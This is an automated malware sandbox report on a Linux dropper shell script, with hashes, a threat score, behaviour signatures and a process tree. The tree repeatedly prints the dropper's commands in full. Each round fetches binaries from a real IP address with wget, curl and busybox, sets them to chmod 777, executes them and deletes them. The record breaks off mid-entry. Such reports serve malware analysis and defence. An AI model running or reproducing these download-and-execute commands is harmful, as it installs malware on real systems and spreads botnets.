e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849

Analysis

max time kernel
109s
max time network
111s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20/11/2024, 03:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh
Size

10KB
MD5

4c73ab068169ebaf4ee1f43aeedd79a2
SHA1

ddd7469d0dd26f19fc17113749d29f091c23e127
SHA256

e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849
SHA512

a49672b144d82d0bc618d3921db994005028ba74cb642cc2da7e74c245cdb97346bffba8e5328bb3ae210ec5a39666ac084d3d3b3379978f55cda9770e483910
SSDEEP

96:eTeTIjrnkpE0kj/VbVpE0kj/B3iZo6fKE++Urnj:eTe8jA9

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
918	chmod
882	chmod
930	chmod
864	chmod
876	chmod
900	chmod
954	chmod
984	chmod
780	chmod
858	chmod
894	chmod
966	chmod
972	chmod
948	chmod
978	chmod
750	chmod
912	chmod
960	chmod
846	chmod
870	chmod
888	chmod
906	chmod
990	chmod
818	chmod
852	chmod
924	chmod
936	chmod
942	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd	curl
File opened for modification	/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN	curl
File opened for modification	/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7	curl
File opened for modification	/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp	curl
File opened for modification	/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp	curl
File opened for modification	/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7	curl
File opened for modification	/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK	curl
File opened for modification	/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN	curl
File opened for modification	/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU	curl
File opened for modification	/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX	curl
File opened for modification	/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7	curl
File opened for modification	/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc	curl
File opened for modification	/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7	curl
File opened for modification	/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ	curl
File opened for modification	/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t	curl
File opened for modification	/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t	curl
File opened for modification	/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK	curl
File opened for modification	/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ	curl
File opened for modification	/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D	curl
File opened for modification	/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv	curl
File opened for modification	/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX	curl
File opened for modification	/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D	curl
File opened for modification	/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU	curl
File opened for modification	/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc	curl
File opened for modification	/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd	curl
File opened for modification	/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc	curl
File opened for modification	/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv	curl
File opened for modification	/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc	curl

/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh
/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh
1⤵
PID:718
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:720
- /usr/bin/wget
  wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  PID:722
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:739
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  PID:749
- /bin/chmod
  chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  ./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  - Executes dropped EXE
  PID:751
- /bin/rm
  rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  PID:752
- /usr/bin/wget
  wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  PID:753
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:754
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  PID:755
- /bin/chmod
  chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  - File and Directory Permissions Modification
  PID:780
- /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  ./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  - Executes dropped EXE
  PID:781
- /bin/rm
  rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  PID:785
- /usr/bin/wget
  wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  PID:786
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:800
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  PID:808
- /bin/chmod
  chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  - File and Directory Permissions Modification
  PID:818
- /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  ./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  - Executes dropped EXE
  PID:820
- /bin/rm
  rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  PID:823
- /usr/bin/wget
  wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  PID:824
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:831
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  PID:838
- /bin/chmod
  chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  ./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  - Executes dropped EXE
  PID:847
- /bin/rm
  rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  PID:848
- /usr/bin/wget
  wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  PID:849
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:850
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  PID:851
- /bin/chmod
  chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  - File and Directory Permissions Modification
  PID:852
- /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  ./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  - Executes dropped EXE
  PID:853
- /bin/rm
  rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  PID:854
- /usr/bin/wget
  wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  PID:855
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:856
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  PID:857
- /bin/chmod
  chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  - File and Directory Permissions Modification
  PID:858
- /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  ./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  - Executes dropped EXE
  PID:859
- /bin/rm
  rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  PID:860
- /usr/bin/wget
  wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  PID:861
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:862
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  PID:863
- /bin/chmod
  chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  - File and Directory Permissions Modification
  PID:864
- /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  ./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  - Executes dropped EXE
  PID:865
- /bin/rm
  rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  PID:866
- /usr/bin/wget
  wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  PID:867
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:868
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  PID:869
- /bin/chmod
  chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  - File and Directory Permissions Modification
  PID:870
- /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  ./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  - Executes dropped EXE
  PID:871
- /bin/rm
  rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  PID:872
- /usr/bin/wget
  wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  PID:873
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:874
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  PID:875
- /bin/chmod
  chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  - File and Directory Permissions Modification
  PID:876
- /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  ./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  - Executes dropped EXE
  PID:877
- /bin/rm
  rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  PID:878
- /usr/bin/wget
  wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  PID:879
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:880
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  PID:881
- /bin/chmod
  chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  - File and Directory Permissions Modification
  PID:882
- /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  ./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  - Executes dropped EXE
  PID:883
- /bin/rm
  rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  PID:884
- /usr/bin/wget
  wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  PID:885
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:886
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  PID:887
- /bin/chmod
  chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  - File and Directory Permissions Modification
  PID:888
- /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  ./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  - Executes dropped EXE
  PID:889
- /bin/rm
  rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  PID:890
- /usr/bin/wget
  wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  PID:891
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:892
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  PID:893
- /bin/chmod
  chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  - File and Directory Permissions Modification
  PID:894
- /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  ./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  - Executes dropped EXE
  PID:895
- /bin/rm
  rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  PID:896
- /usr/bin/wget
  wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  PID:897
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:898
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  PID:899
- /bin/chmod
  chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  - File and Directory Permissions Modification
  PID:900
- /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  ./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  - Executes dropped EXE
  PID:901
- /bin/rm
  rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  PID:902
- /usr/bin/wget
  wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  PID:903
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:904
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  PID:905
- /bin/chmod
  chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  - File and Directory Permissions Modification
  PID:906
- /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  ./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  - Executes dropped EXE
  PID:907
- /bin/rm
  rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  PID:908
- /usr/bin/wget
  wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  PID:909
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:910
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  PID:911
- /bin/chmod
  chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  - File and Directory Permissions Modification
  PID:912
- /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  ./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  - Executes dropped EXE
  PID:913
- /bin/rm
  rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
  2⤵
  PID:914
- /usr/bin/wget
  wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  PID:915
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:916
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  PID:917
- /bin/chmod
  chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  - File and Directory Permissions Modification
  PID:918
- /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  ./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  - Executes dropped EXE
  PID:919
- /bin/rm
  rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
  2⤵
  PID:920
- /usr/bin/wget
  wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  PID:921
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:922
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  PID:923
- /bin/chmod
  chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  - File and Directory Permissions Modification
  PID:924
- /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  ./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  - Executes dropped EXE
  PID:925
- /bin/rm
  rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
  2⤵
  PID:926
- /usr/bin/wget
  wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  PID:927
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:928
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  PID:929
- /bin/chmod
  chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  - File and Directory Permissions Modification
  PID:930
- /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  ./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  - Executes dropped EXE
  PID:931
- /bin/rm
  rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
  2⤵
  PID:932
- /usr/bin/wget
  wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  PID:933
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:934
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  PID:935
- /bin/chmod
  chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  - File and Directory Permissions Modification
  PID:936
- /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  ./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  - Executes dropped EXE
  PID:937
- /bin/rm
  rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
  2⤵
  PID:938
- /usr/bin/wget
  wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  PID:939
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:940
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  PID:941
- /bin/chmod
  chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  - File and Directory Permissions Modification
  PID:942
- /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  ./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  - Executes dropped EXE
  PID:943
- /bin/rm
  rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
  2⤵
  PID:944
- /usr/bin/wget
  wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  PID:945
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:946
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  PID:947
- /bin/chmod
  chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  - File and Directory Permissions Modification
  PID:948
- /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  ./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  - Executes dropped EXE
  PID:949
- /bin/rm
  rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
  2⤵
  PID:950
- /usr/bin/wget
  wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  PID:951
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:952
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  PID:953
- /bin/chmod
  chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  - File and Directory Permissions Modification
  PID:954
- /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  ./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  - Executes dropped EXE
  PID:955
- /bin/rm
  rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
  2⤵
  PID:956
- /usr/bin/wget
  wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  PID:957
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:958
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  PID:959
- /bin/chmod
  chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  - File and Directory Permissions Modification
  PID:960
- /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  ./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  - Executes dropped EXE
  PID:961
- /bin/rm
  rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
  2⤵
  PID:962
- /usr/bin/wget
  wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  PID:963
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:964
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  PID:965
- /bin/chmod
  chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  - File and Directory Permissions Modification
  PID:966
- /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  ./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  - Executes dropped EXE
  PID:967
- /bin/rm
  rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
  2⤵
  PID:968
- /usr/bin/wget
  wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  PID:969
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:970
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  PID:971
- /bin/chmod
